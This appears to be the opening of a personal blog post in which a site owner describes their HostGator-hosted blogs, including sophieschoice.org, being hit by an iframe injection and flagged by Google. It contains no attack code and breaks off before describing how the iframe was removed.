How did I remove the iframe the hackers put on my index pages

All my sites on Hostgator got attacked by iframe hack

At 7 pm tonight my students emailed me that our blog was down. OK, I thought I was safe... (don't we all?) Except... one of my blogs, http://www.sophieschoice.org was attacked. Google flagged it, it took me a long time to even get to it... on the back door.
